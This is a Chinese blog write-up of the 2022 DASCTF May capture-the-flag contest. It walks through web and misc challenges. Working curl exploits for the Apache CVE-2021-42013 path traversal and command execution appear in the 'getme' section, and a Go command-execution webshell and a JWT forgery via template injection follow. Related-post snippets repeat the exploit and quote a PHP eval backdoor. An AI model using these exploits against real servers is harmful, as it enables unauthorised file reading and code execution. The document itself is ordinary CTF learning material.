2022DASCTF MAY 出题人挑战赛个人Writeup

原创 已于 2022-11-24 11:12:06 修改 · 1.3k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #linux #http

于 2022-05-22 14:50:13 首次发布
本文详细记录了一次网络安全挑战赛的参赛经历,涉及Web领域的PowerCookie、魔法浏览器、getme、hackme等题目,以及Misc类的不解PCB的厨师、卡比和神必流量等挑战。通过源代码分析、漏洞利用和解密等方法,成功解题并获取flag。文章突出了在网络安全竞赛中的实战技巧和解题思路。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

感觉这次难度还比较友好,没有队友一个人肝了一天肝到第18,不过全是web和misc,有两道题耽搁时间有点久最后也没出。最后半个小时才开始看密码题,感觉再给点时间的话也能出,有点可惜。

在这里插入图片描述

文章目录

WEB

Power Cookie

以游客身份登录,发现服务器返回了set-cookie
请添加图片描述

将set-cookie返回的值上送,并修改成管理员即可

Cookie: admin=1; Path=/; Domain=127.0.0.1; Max-Age=3600

请添加图片描述

魔法浏览器

查看源代码,找到魔法浏览器的UA值
在这里插入图片描述

重放报文并修改User-Agent

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Magic/100.0.4896.75

在这里插入图片描述

getme

本题考点CVE-2021-42013-Apache HTTP Server 2.4.50路径穿越漏洞,直接上exp
可以实现任意文件读取

curl -v --path-as-is http://node4.buuoj.cn:25908/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

在这里插入图片描述
直接读根目录下的/flag文件发现是个假的,然后再用命令执行的exp打,这里浪费了点时间,发现怎么都找不到flag,一度怀疑是否要提权。最后在/diajgk/djflgak/qweqr/eigopl/这个路径下发现了,藏得也太深了。。。

curl -v --data "echo;more /diajgk/djflgak/qweqr/eigopl/fffffflalllallalagggggggggg -al" 'http://node4.buuoj.cn:25908/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

在这里插入图片描述

hackme

在这里插入图片描述

进入对应页面可以显示对应的内容,发现users页面显示:

在这里插入图片描述

猜测页面对应的是users.go文件。

发现存在/upload页面,可以上传go文件,上传一个试试。

这里注意文件名只能是users.go,别的文件名无效,这里应该是有白名单控制。
在这里插入图片描述

访问users发现成功了。
在这里插入图片描述

下面思路就是上传一个可以命令执行的go文件,将结果输出到页面上,且文件名为users,然后再访问users页面即可。

代码如下:

package main
import (
"bytes"
"fmt"
"log"
"os/exec"
)
const ShellToUse = "bash"
func Shellout(command string) (error, string, string) {
var stdout bytes.Buffer
var stderr bytes.Buffer
cmd := exec.Command(ShellToUse, "-c", command)
cmd.Stdout = &stdout
cmd.Stderr = &stderr
err := cmd.Run()
return err, stdout.String(), stderr.String()
}
func main() {
err, out, errout := Shellout("cat /flag")
if err != nil {
log.Printf("error: %v\n", err)
}
fmt.Println("--- stdout ---")
fmt.Println(out)
fmt.Println("--- stderr ---")
fmt.Println(errout)
}

fxxkgo

下载附件进行代码审计,一共给了如下几只接口:

func main()  {
	admin := Account{admin_id, admin_pw, true, secret_key}
	acc = append(acc, admin)
	r := gin.Default()
	r.GET("/",index)
	// 登录后访问,返回id
	r.POST("/", rootHandler)
	// 获取flag
	r.POST("/flag", flagHandler)
	r.POST("/auth", authHandler)
	r.POST("/register", Resist)
	r.Run(":80")

}

注册接口 /register
注册用户,上送id和pw
在这里插入图片描述
登录接口 /auth
登录用户,上送id和pw,返回token
在这里插入图片描述
返回的token经过JWT编码,可以看到不是管理员
在这里插入图片描述
因此这里思路就是进行JWT伪造,不过首先需要知道JWT的密钥,接着往下看。

(不知道叫啥名字我暂且称之为)根目录接口

根据代码审计,服务器会拿请求头的X-Token字段进行解码,因此我们上送一下

func rootHandler(c *gin.Context) {
	token := c.GetHeader("X-Token")
	if token != "" {
		id, _ := jwt_decode(token)
		acc := get_account(id)
		tpl, err := template.New("").Parse("Logged in as " + acc.id)
		if err != nil {
		}
		tpl.Execute(c.Writer, &acc)
		return
	} else {

		return
	}
}

func flagHandler(c *gin.Context) {
	token := c.GetHeader("X-Token")
	if token != "" {
		id, is_admin := jwt_decode(token)
		if is_admin == true {
			p := Resp{true, "Hi " + id + ", flag is " + flag}
			res, err := json.Marshal(p)
			if err != nil {
			}
			c.JSON(200, string(res))
			return
		} else {
			c.JSON(403, gin.H{
				"code": 403,
				"status": "error",
			})
			return
		}
	}
}

在这里插入图片描述

发现可以回显用户的id

又根据代码审计,用户账户中有一个secret_key字段,即为JWT的加密密钥。

type Account struct {
	id         string
	pw         string
	is_admin   bool
	secret_key string
}

func jwt_encode(id string, is_admin bool) (string, error) {
	claims := AccountClaims{
		id, is_admin, jwt.StandardClaims{},
	}
	token := jwt.NewWithClaims(jwt.SigningMethodHS256, claims)
	return token.SignedString([]byte(secret_key))
}

func jwt_decode(s string) (string, bool) {
	token, err := jwt.ParseWithClaims(s, &AccountClaims{}, func(token *jwt.Token) (interface{}, error) {
		return []byte(secret_key), nil
	})
	if err != nil {
		fmt.Println(err)
		return "", false
	}
	if claims, ok := token.Claims.(*AccountClaims); ok && token.Valid {
		return claims.Id, claims.Is_admin
	}
	return "", false
}

那么这里考虑利用SSTI漏洞泄露出用户账户信息。

1、使用/register接口注册,id上送为{{.}}
2、使用auth登录,得到token
3、请求头X-Token参数上送刚才2回显的token,访问根目录

在这里插入图片描述

得到密钥为fasdf972u1041xu90zm10Av
使用密钥伪造jwt,将is_admin标识是否管理员的字段值修改为true

在这里插入图片描述

使用伪造的jwt请求flag即可

在这里插入图片描述

MISC

不懂PCB的厨师不是好黑客

下载附件,直接搜索关键字DAS
attachment/PCB/c004aa25e9434d05ba7ddeeafecc278c.epcb,在这个文件内找到flag

在这里插入图片描述

卡比

请添加图片描述

经过信息搜集,发现是星之卡比·探索发现中的神秘文字

请添加图片描述

解密得到ptrh{gwdvswvqbfiszsz}
根据密文结构推测是维吉尼亚密码,尝试进行解密,密钥kirby

在这里插入图片描述

神必流量

分析流量包,发现有其中一个USBMS协议的流量传输了一个7z文件

在这里插入图片描述

将文件提取出来,解压需要密码,尝试弱密码123456成功解压
打开是一个链接,是Google云盘的两个文件,下载需要科学上网

在这里插入图片描述

下载得到一个压缩包,仍然是弱密码123456解压

得到一个main.exeoutput.txt,尝试运行exe文件

在这里插入图片描述

逆向分析exe文件,将txt文件名修改为flag.txt,再次运行,得到flag

在这里插入图片描述
在这里插入图片描述

2022DASCTF Apr X FATE 防疫挑战赛 WriteUP
Huamang的博客
04-25 2529
文章目录MiscSimpleFlowWebwarmup-phpsoeasy_php Misc SimpleFlow 看流量大概是上传了一个后门,但是会对payload加密,这里发现有flag.txt被打包 后面的包里面发现flag.zip 但是打开需要密码,那么我们就要回去压缩的地方,看看给的什么密码,所以我们就得解开这个流量 @eval(@base64_decode($_POST['m8f8d9db647ecd'])); &e57fb9c067c677=o3 &g479cf6f058c
2022DASCTF Apr X FATE 防疫挑战赛WP
LaniakeaHarry的博客
04-24 3771
NEFU-NSILIB下Maple战队分队于4月23日10:00 - 18:00所产WriteUp.
2022DASCTF MAY 出题挑战赛
qq_61620566的博客
05-27 1287
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、misc 1.不懂PCB的厨师不是好黑客 2.卡比 二、web 1. 2. 总结 前言 提示:这里可以添加本文要记录的大概内容: 例如:随着工智能的不断发展,机器学习这门技术也越来越重要,很多都开启了学习机器学习,本文就介绍了机器学习的基础内容。 提示:以下是本篇文章正文内容,下面案例可供参考 一、misc 1.不懂PCB的厨师不是好黑客 用记事本.
2022DASCTF MAY 出题挑战赛 misc
mumuzi的博客
05-22 3118
MAYMISC
【Web】2022DASCTF MAY 出题挑战赛 题解(全)
uuzeray的博客
04-18 1239
注册时传入{{.}}获取当前对象信息,就可获取jwt的secretkey,再令is_admin为true伪造jwt即可获得flag即可。sys_auth函数默认$type为0是加密,传入$type为1是解密。那只要用$type=0默认值,反过来加密我们欲下载恶意文件的url即可。/flag路由下只要is_admin为true就可以读flag。默认的$key为常量Mc_Encryption_Key。弱口令admin/123456/123456登录。带着伪造的jwt访问/flag拿到flag。
2022DASCTF MAY web
weixin_63231007的博客
07-20 597
命令"'目标地址端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'curl-v--path-as-is目标地址端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd。所有需要我们上传一个users.go文件,然后其执行,我们访问users,会返回文件执行结果。......
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1
08-03
Venom-2021-强网拟态防御国际精英挑战赛-WriteUp1 本篇WriteUp主要介绍了Venom-2021强网拟态防御国际精英挑战赛中的一个Web挑战题,涉及到Node.js、Express框架、JavaScript、Crypto库、Cookie会话等技术。下面我们...
2024第一届Solar杯应急响应挑战赛-WriteUp
m0_64312309的博客
01-02 1787
直接列出所有用户,我尝试Testuser发现错误,Administrator和Guest是系统自带的,ASP.NET似乎是微软的一个后端框架,尝试这个成功。首先去看powershell的日志事件,可以发现里面有很多命令执行记录,我们挨个分析,可以知道大致逻辑是先用gz压缩恶意文件,然后base64编码。流量分析中发现b.jsp的流量最大,而且都是加密内容,这里直接反编译一下发现flag,反编译这里。这个文件夹默认权限是system的 改完刷新你就可以看到文件夹下的东西了。
2022HFCTF-线上赛官方Writeup1
08-04
在HFCTF 2022线上赛中,参赛者面临了一系列挑战,涵盖了网络安全的多个领域,包括Web安全、加密、逆向工程等。这里我们将深入探讨其中涉及到的一些关键技术点。 首先,描述中提到了“RSA 公钥解密”,这涉及到非...
易语言魔法浏览器源码
08-01
这是一个易语言开发的浏览器源码,可以作为初学者的参考价值!
网页千色字 下载 3.5.080203魔幻版网页千色字 下载 3.5.080203魔幻版
09-30
网页千色字 下载 3.5.080203魔幻版网页千色字 下载 3.5.080203魔幻版网页千色字 下载 3.5.080203魔幻版网页千色字 下载 3.5.080203魔幻版
2022DASCTF MAY 出题挑战赛 Writeup
末初 · mochu7
05-23 1194
2022DASCTF MAY 出题挑战赛 Writeup
BUUCTF做题笔记
最新发布
2401_86646880的博客
02-12 210
打开题目点击flag,hint发现没什么线索结合题目The mystery of ip 说明与IP有关抓包添加X-Forwarded-For表头发现可行尝试命令执行找到了flag用cat查看。
2022DASCTF MAY 出题挑战赛 web复现
errorr0
05-23 1201
DASCTF
DASCTF X CBCTF 2022九月挑战赛 WriteUp
Whitebird的博客
10-24 835
DASCTF X CBCTF 2022九月挑战赛 WriteUp
2022DASCTF MAY 出题挑战赛web部分
m0_62422842的博客
05-23 569
前言 这是五月份buu的比赛,当时专心备考,所以没有怎么看,这次就来复现一下比赛中的一些web题吧。 Power Cookie 题目中提到了cookie,那肯定与cookie有关。题目中的信息没有给太多,那就bp抓包看看吧。 抓包分析看出set-cookie中admin为0 什么是set-Cookie?它向客户端发送一个http的cookie。cookie是由服务器发送给游览器的变量。上面是admin=0,我们需要管理员登录则就要admin=1。那这题就明显了。直接改包添加cookie就行了呀
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

2ha0yuk7on.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值